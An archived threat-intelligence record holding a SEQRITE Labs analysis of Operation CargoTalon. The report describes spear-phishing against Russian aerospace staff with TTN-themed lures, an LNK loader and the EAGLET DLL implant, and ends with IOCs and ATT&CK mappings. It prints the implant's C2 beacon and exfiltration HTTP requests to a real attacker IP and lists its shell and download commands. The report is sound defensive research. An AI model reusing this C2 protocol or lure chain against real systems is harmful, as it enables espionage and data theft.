{ "id": "d1e20900-249a-4452-a797-aee03221ffcb", "created_at": "2026-04-06T00:09:47.134681Z", "updated_at": "2026-04-10T03:36:37.118859Z", "deleted_at": null, "sha1_hash": "ca4da019c7f1c6d3e2bb8bf876cbf1e41f020bb1", "title": "Operation CargoTalon : UNG0901 Targets Russian Aerospace \u0026 Defense Sector using EAGLET implant.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1794198, "plain_text": "Operation CargoTalon : UNG0901 Targets Russian Aerospace \u0026 Defense\r\nSector using EAGLET implant.\r\nBy Subhajeet Singha\r\nPublished: 2025-07-23 · Archived: 2026-04-05 18:23:12 UTC\r\nContents\r\nIntroduction\r\nInitial Findings\r\nInfection Chain.\r\nTechnical Analysis\r\nStage 0 – Malicious Email File.\r\nStage 1 – Malicious LNK file.\r\nStage 2 – Looking into the decoy file.\r\nStage 3 – Malicious EAGLET implant.\r\nHunting and Infrastructure.\r\nInfrastructural details.\r\nSimilar campaigns.\r\nAttribution\r\nConclusion\r\nSEQRITE Protection.\r\nIOCs\r\nMITRE ATT\u0026CK.\r\nIntroduction\r\nSEQRITE Labs APT-Team has recently found a campaign, which has been targeting Russian Aerospace Industry. The\r\ncampaign is aimed at targeting employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft\r\nproduction entities in Russia via using товарно-транспортная накладная (TTN) documents — critical to Russian logistics\r\noperations. The entire malware ecosystem involved in this campaign is based on usage of malicious LNK file EAGLET\r\nDLL implant, further executing malicious commands and exfiltration of data.\r\nIn this blog, we will explore the technical details of the campaign. we encountered during our analysis. We will examine the\r\nvarious stages of this campaign, starting from deep dive into the initial infection chain to implant used in this campaign,\r\nending with a final overview covering the campaign.\r\nInitial Findings\r\nRecently, on 27th of June, our team upon hunting malicious spear-phishing attachments, found a malicious email file, which\r\nsurfaced on sources like VirusTotal, upon further hunting, we also found a malicious LNK file, which was responsible for\r\nexecution of the malicious DLL-attachment whose file-type has been masquerading as ZIP-attachment.\r\nUpon looking into the email, we found the file Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip which\r\ntranslates to Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip is basically a DLL file and upon further\r\nhunting, we found another file which is a shortcut [LNK] file, having the same name. Then, we decided to look into the\r\nworkings of these files.\r\nInfection Chain\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 1 of 14\n\nTechnical Analysis\r\nWe will break down the analysis of this campaign into three different parts, starting with looking into the malicious EML\r\nfile, followed by the attachment I.e., the malicious DLL implant and the LNK file.\r\nStage 0 – Malicious Email File.\r\nWell, initially, we found a malicious e-mail file, named as backup-message-10.2.2.20_9045-800282.eml , uploaded from\r\nRussian-Federation. Upon, looking into the specifics of the e-mail file.\r\nWe found that the email was sent to an employee at Voronezh Aircraft Production Association (VASO), from Transport and\r\nLogistics Centre regarding a Delivery note.\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 2 of 14\n\nLooking in the contents of the email, we found that the message was crafted to deliver the news of recent logistics\r\nmovement, also referencing a consignment note (Товарно-транспортная накладная №391-44 от 26.06.2025), the email\r\ncontent also urges the receiver to prepare for the delivery of a certain cargo in 2-3 days. As, we already noticed that the\r\nthreat actor impersonates an individual, we also noticed that there is a malicious attachment, masquerading as ZIP file. Upon\r\ndownloading, we figured out that it was a malicious DLL implant.\r\nApart, from the malicious DLL implant, we also hunted a malicious LNK file, with the same name, we believe has been\r\ndropped by another spear-phishing attachment, which is used to execute this DLL implant, which we have termed as\r\nEAGLET.\r\nIn the next section, we will look into the malicious LNK file.\r\nStage 1 – Malicious LNK File.\r\nUpon, looking inside the LNK file, we found that it is performing some specific set of tasks which finally executes the\r\nmalicious DLL file and also spawns a decoy pop-up on the screen. It does this by following manner.\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 3 of 14\n\nInitially, it uses powershell.exe binary to run this script in background, which enumerates the masquerading ZIP file, which\r\nis the malicious EAGLET implant, then in-case it finds the malicious implant, it executes it via rundll32.exe LOLBIN, else\r\nin-case it fails to find it recursively looks for the file under %USERPROFILE% and in-case it finds, it runs it, then, if it fails\r\nto find it in that location, it looks tries to look under %TEMP% location.\r\nOnce it has found the DLL implant, it is executed and then extracts a decoy XLS file embedded within the implant, which is\r\nperformed by reading the XLS file of 59904 bytes which is stored just after the starting 296960 bytes, which is then written\r\nunder %TEMP% directory with named ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. This is the purpose of\r\nthe malicious LNK file, in the next section, we will look into the decoy file.\r\nStage 2- Looking into the decoy file.\r\nIn this section, we will look into the XLS decoy file, which has been extracted from the DLL implant.\r\nInitially, we identified that the referenced .XLS file is associated with a sanctioned Russian entity, Obltransterminal LLC\r\n(ООО “Облтранстерминал”), which appears on the U.S. Department of the Treasury’s OFAC SDN (Specially Designated\r\nNationals) list. The organization has been sanctioned under Executive Order 14024 for its involvement in Russia’s military-logistics infrastructure.\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 4 of 14\n\nThen, we saw the XLS file contains details about structured fields for recording container number, type, tare weight, load\r\ncapacity, and seal number, as well as vehicle and platform information. Notably, it includes checkboxes for container status\r\n—loaded, empty, or under repair—and a schematic area designated for marking physical damage on the container.\r\nThen, we can see that the decoy contains a detailed list of container damage codes typically used in Russian logistics\r\noperations. These codes cover a wide range of structural and mechanical issues that might be identified during a container\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 5 of 14\n\ninspection. The list includes specific terms such as cracks or punctures (Трещина), deformations of top and bottom beams\r\n(Деформация верхних/нижних балок), corrosion (Сквозная коррозия), and the absence or damage of locking rods,\r\nhinges, rubber seals, plates, and corner fittings. Each damage type is systematically numbered from 1 to 24, mimicking\r\nstandardized inspection documentation.\r\nOverall, the decoy is basically about simulating an official Russian container inspection document—specifically, an\r\nEquipment Interchange Report (EIR)—used during the transfer or handover of freight containers. It includes\r\nstructured fields for container specifications, seal numbers, weight, and vehicle data, along with schematic diagrams and a\r\nstandardized list of 24 damage codes covering everything from cracks and deformations to corrosion and missing parts\r\nassociated with Obltransterminal LLC. In, the next section, we will look into the EAGLET implant.\r\nStage 3 – Malicious EAGLET implant.\r\nInitially, as we saw that the implant and loaded it into a PE-analysis tool, we could confirm that, this is a PE file, with the\r\ndecoy being stored inside the overlay section, which we already saw previously.\r\nNext, looking into the exports of this malicious DLL, we looked into the EntryPoint and unfortunately it did not contain\r\nanything interesting. Next, looking into the DllEntryPoint which lead us to the DllMain which did contain interesting code,\r\nrelated to malicious behavior.\r\nThe initial interesting function, which basically enumerates info on the target machine.\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 6 of 14\n\nIn this function, the code goes ahead and creates a unique GUID of the target, which will be used to identify the victim,\r\nevery time the implant is executed a new GUID is generated, this mimics the behavior of session-id which aids the operator\r\nor the threat actor to gain clarity on the target.\r\nThen, it enumerates the computer-name of the target machine along with the hostname and DNS domain name of the target\r\nmachine. Once it has received it, then it goes ahead and creates a directory known as MicrosoftApppStore under the\r\nProgramData location.\r\nNext, using CreateThread it creates a malicious thread, which is responsible for connecting to the command-and-control[C2]\r\nIP and much more.\r\nNext, we can see that the implant is using certain Windows networking APIs such as WinHttpOpen to initiate a HTTP\r\nsession, masquerading under an uncommon looking user-agent string MicrosoftAppStore/2001.0, which then is followed by\r\nanother API known as WinHtppConnect which tries to connect to the hardcoded command-and-control[C2] server which is\r\n185.225.17.104 over port 80, in case it fails, it keeps on retrying.\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 7 of 14\n\nIn, case the implants connect to the C2, it forms a URL path which us used to send a GET request to the C2 infrastructure.\r\nThe entire request body looks something like this:\r\nGET /poll?id=\u003c{randomly-created-GUID}\u0026hostname={hostname}\u0026domain={domain} HTTP/1.1Host: 185.225.17.104\r\nAfter sending the request, the implant attempts to read the HTTP response from the C2 server, which may contain\r\ninstructions to perform certain instructions.\r\nRegarding the functionality, the implant supports shell-access which basically gives the C2-operator or threat actor a shell on\r\nthe target machine, which can be further used to perform malicious activities.\r\nAnother feature is the download feature, in this implant, which either downloads malicious content from the server or\r\nexfiltrating required or interesting files from the target machine. One feature downloads malicious content from the server\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 8 of 14\n\nand stores it under the location C:\\ProgramData\\MicrosoftAppStore\\. As, the C2 is currently down, while this research is\r\nbeing published, the files which had or have been used could not be discovered.\r\nLater, another functionality irrelevant to this download feature also became quite evident that the implant is basically\r\nexfiltrating files from the target machine. The request body looks something like this:\r\nPOST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-\r\n4d0f-b4de-fc62b4c4fa6f\u0026hostname=VICTIM-PC\u0026domain=CORP\u0026result=Q29tbWFuZCByZXN1bHQgdGV4dA==\r\nTherefore, the features are as follows.\r\nFeature\r\nTrigger\r\nKeyword\r\nBehavior Purpose\r\nCommand\r\nExecution\r\ncmd:\r\nExecutes a shell command received from the C2 server and\r\ncaptures the output\r\nRemote Code\r\nExecution\r\nFile Download download:\r\nDownloads a file from a remote location and saves it to\r\nC:\\ProgramData\\MicrosoftAppStore\\\r\nPayload Staging\r\nExfiltration (automatic)\r\nSends back the result of command execution or download\r\nstatus to the C2 server via HTTP POST\r\nData\r\nExfiltration\r\nThat sums up the technical analysis of the EAGLET implant, next, we will look into the other part, which focuses on\r\ninfrastructural knowledge and hunting similar campaigns.\r\nHunting and Infrastructure\r\nInfrastructural details\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 9 of 14\n\nIn this section, we will look into the infrastructure related artefacts. Initially, the C2, which we found to be\r\n185[.]225[.]17[.]104, which is responsible for connecting to the EAGLET implant. The C2 server is located in Romania\r\nunder the ASN 39798 of MivoCloud SRL.\r\nWell, looking into it, we found that a lot of passive DNS records were pointing to historical infrastructure previously\r\nassociated with the same threat cluster which links to TA505, which have been researched by researchers at BinaryDefense.\r\nThe DNS records although suggest that similar or recycled infrastructure have been used in this campaign. Also, apart from\r\nthe infrastructural co-relations with TA505 only in terms of using recycled domains, we also saw some other dodgy domains\r\npointing have DNS records pointing towards this same infrastructure. With high-confidence, we can assure that, the current\r\ncampaign has no-correlation with TA505, apart from the afore-mentioned information.\r\nSimilar, to the campaign, targeting Aerospace sector, we have also found another campaign, which is targeting Russian\r\nMilitary sector through recruitment themed documents. We found in that campaign, the threat actor used EAGLET implant\r\nwhich connects to the C2, I.e., 188[.]127[.]254[.]44 which is located in Russian under the ASN 56694, belonging to LLC\r\nSmart Ape organization.\r\nSimilar Campaigns\r\nCampaign 1 – Military Themed Targeting\r\nInitially, we saw the URL body, and many other behavioral artefacts of the implant, which led us to another set of\r\ncampaigns, with exactly similar implant, used to target Russian Military Recruitment.\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 10 of 14\n\nThis decoy was extracted from an EAGLET implant which is named as Договор_РН83_изменения.zip which translates to\r\nContract_RN83_Changes , which has been targeting individuals and entities related to Russian Military recruitment. As, we\r\ncan see that the decoy highlights multiple advantages of serving which includes house-mortgage to pension and many more\r\nadvantages.\r\nCampaign 2 – EAGLET implant with no decoy embedded\r\nAs, in the previous campaigns we saw that occasionally, the threat entity drops a malicious LNK, which executes the DLL\r\nimplant and extracts the decoy present inside the implant’s overlay section, but in this, we also saw an implant, with no such\r\ndecoy present inside.\r\nAlong, with these, we also saw multiple overlaps of these campaigns having similar target-interests and implant code\r\noverlap with the threat entity known as Head Mare which have been targeting Russian speaking entities initially discovered\r\nby researchers at Kaspersky.\r\nAttribution\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 11 of 14\n\nAttribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various\r\ndomains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat\r\nactor, and sometimes operational mistakes such as using similar file or decoy nomenclature.\r\nIn our ongoing tracking on UNG0901, we discovered notable similarities and overlaps with threat group known as Head\r\nMare, as identified by researchers at Kaspersky. Let us explore some of the key overlaps between Head Mare and\r\nUNG0901.\r\nKey Overlaps Between UNG0901 and Head Mare\r\n1. Tooling Arsenal:\r\nResearchers at Kaspersky observed that Head Mare often uses a Golang based backdoor known as PhantomDL, which is\r\noften packed using software packer such as UPX, which have very simple yet functional features such as shell , download ,\r\nupload , exit. Similarly, UNG0901 has also deployed EAGLET implant, which shows similar behavior and has nearly to\r\nvery similar features such as shell, download, upload etc. which is programmed in C++.\r\n2. File-Naming technique:\r\nResearchers at Kaspersky observed that the PhantomDL malware is often deployed via spear-phishing with file names such\r\nas Contract_kh02_523, similarly in the campaigns which we witnessed by UNG0901, there were filenames with similar\r\nstyle such as Contract_RN83_Changes. And many more file-naming schemes which we found to be similar.\r\n3. Motivation:\r\nHead Mare has been targeting important entities related to Russia, whereas UNG0901 has also targeted multiple important\r\nentities belonging to Russia.\r\nApart from these, there are much additional and strong similarities which reinforce the connection between these two threat\r\nentities; therefore, we attribute UNG0901 threat entity shares resources and many other similarities with Head Mare,\r\ntargeting Russian governmental \u0026 non-governmental entities.\r\nConclusion\r\nUNG0901 or Unknown-Group-901 demonstrates a targeted cyber operation against Russia’s aerospace and defense sectors\r\nusing spear-phishing emails and a custom EAGLET DLL implant for espionage and data exfiltration. UNG0901 also\r\noverlaps with Head Mare which shows multiple similarities such as decoy-nomenclature and much more.\r\nSEQRITE Protection\r\nAgentCiR\r\ntrojan.49644.SL\r\nIOCs\r\nFile-Type FileName SHA-256\r\nLNK Договор_РН83_изменения.pdf.lnk a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e756\r\nТранспортная_накладная_ТТН_№391-\r\n44_от_26.06.2025.xls.lnk\r\n4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720c\r\nDLL Договор_РН83_изменения.zip 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657b\r\nТранспортная_накладная_ТТН_№391-\r\n44_от_26.06.2025.zip\r\n01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 12 of 14\n\nN/A b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57\r\nДоговор_РН83_изменения.zip 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d\r\nDecoy[XLS/\r\nPDF]\r\ntemp.pdf 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809\r\nsample_extracted.xls f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2\r\n80650000 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7\r\nsample_extracted.xls c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2\r\nsample_extracted.xls 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0\r\nsample_extracted.xls e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a85510642\r\nsample_extracted.xls a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b068\r\nEmail-File\r\nbackup-message-10.2.2.20_9045-\r\n800282.eml\r\nae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8\r\nMITRE ATT\u0026CK\r\nTactic Technique ID Details\r\nInitial Access\r\nSpearphishing\r\nAttachment\r\nT1566.001\r\nMalicious .EML file sent to VASO employee,\r\nimpersonating a logistics center with TTN document\r\nlure.\r\nExecution\r\nSystem Binary Proxy\r\nExecution: Rundll32\r\nT1218.011\r\nDLL implant executed via trusted rundll32.exe\r\nLOLBIN, called from the .LNK file.\r\nPowerShell T1059.001\r\nUsed for locating and launching the DLL implant from\r\nmultiple fallback directories.\r\nPersistence\r\nImplant in ZIP-disguised\r\nDLL\r\n[Custom]\r\nDLL masquerades as .ZIP file — persistence implied via\r\noperator-controlled executions.\r\nDefense\r\nEvasion\r\nMasquerading T1036\r\nImplant disguised as ZIP, decoy XLS used to simulate\r\nsanctioned logistics paperwork.\r\nDiscovery\r\nSystem Information\r\nDiscovery\r\nT1082\r\nGathers hostname, computer name, domain; creates\r\nvictim GUID to identify target.\r\nDomain Trust Discovery T1482 Enumerates victim’s DNS domain for network profiling.\r\nCommand \u0026\r\nControl\r\nApplication Layer\r\nProtocol: HTTP\r\nT1071.001\r\nCommunicates with C2 via HTTP; uses\r\nMicrosoftAppStore/2001.0 User-Agent.\r\nCollection Data from Local System T1005\r\nExfiltrates system details and file contents as per threat\r\nactor’s command triggers.\r\nExfiltration\r\nExfiltration Over C2\r\nChannel\r\nT1041\r\nPOST requests to /result endpoint on C2 with encoded\r\ncommand results or exfiltrated data.\r\nImpact Data Exfiltration T1537 Targeted data theft from Russian aerospace sector.\r\nAuthors:\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 13 of 14\n\nSubhajeet Singha\r\nSathwik Ram Prakki\r\nSource: https://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nhttps://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/" ], "report_names": [ "operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant" ], "threat_actors": [ { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "401a4c49-1b76-49ea-8b31-9a8c3c0bd9b9", "created_at": "2025-03-18T11:50:08.877355Z", "updated_at": "2026-04-10T02:00:03.639241Z", "deleted_at": null, "main_name": "Head Mare", "aliases": [], "source_name": "MISPGALAXY:Head Mare", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6ba499e8-6c4d-4c49-8d0c-2bf29ea014c5", "created_at": "2026-02-03T02:00:03.44377Z", "updated_at": "2026-04-10T02:00:03.942489Z", "deleted_at": null, "main_name": "UNG0901", "aliases": [ "Operation CargoTalon", "Unknown-Group-901" ], "source_name": "MISPGALAXY:UNG0901", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434187, "ts_updated_at": 1775792197, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ca4da019c7f1c6d3e2bb8bf876cbf1e41f020bb1.pdf", "text": "https://archive.orkl.eu/ca4da019c7f1c6d3e2bb8bf876cbf1e41f020bb1.txt", "img": "https://archive.orkl.eu/ca4da019c7f1c6d3e2bb8bf876cbf1e41f020bb1.jpg" } }